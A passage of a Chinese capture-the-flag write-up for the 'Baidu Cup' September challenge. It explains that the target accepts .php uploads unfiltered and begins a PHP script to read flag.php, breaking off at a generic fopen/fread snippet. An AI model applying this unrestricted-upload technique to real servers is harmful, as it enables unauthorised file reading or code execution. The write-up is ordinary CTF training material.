“百度杯”CTF比赛 九月场
题目内容:
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
测试可以上传文件类型
.txt .php.js 都可以上传成功
说明在上传文件的过程中并无拦截
题目中的“想怎么传就怎么传”说的没错
构造php脚本
- 既然有提示“tips:flag在flag.php中 ”,故只要可以阅读flag.php的内容即可。
<?php
// get contents of a file into a string
$filename = "/usr/local/something.txt";
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));